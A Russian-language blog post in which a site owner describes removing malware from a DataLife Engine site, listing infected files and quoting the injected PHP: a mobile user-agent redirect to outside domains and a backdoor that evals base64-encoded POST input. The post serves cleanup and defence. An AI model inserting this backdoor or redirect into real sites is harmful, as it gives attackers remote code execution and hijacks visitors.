Вирусы на DLE сайте

Опять вирусы на DLE! На этот раз я их искала довольно долго и даже успела попасть в черный список Яндекса. Но я нашла эту заразу и делюсь с вами:

Вирусы на сайте DLE. Как удалить? 

Если ваш сайт на DLE, то вредоносный код может прятаться в следующих файлах: 

index.php
engine/engine.php
engine/data/config.php
engine/data/dbconfig.php
engine/init.php
language/Russian/website.lng
 

У меня были в файлах website.lng и dbconfig.php. Выглядит вредоносный код следующим образом:

В dbconfig.php вверху и внизу  

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://googleinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));настоящий код файла $iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) { 
    header('Location: http://statuses.ws/');
}
 

В website.lng только внизу 


if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://googleinternet.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

Что делать: удалить этот код (будьте внимательны при удалении, чтобы не удалить часть настоящего кода) и поставить на файлы атрибуты 444.

Сайты на DLE



Понравилась новость

Вирусы на DLE сайте

Напишите пожалуйста своё мнение, Коте будет очень приятно :)




Комментарии к публикации Вирусы на DLE сайте:




Имя:*
E-Mail:
Комментарий: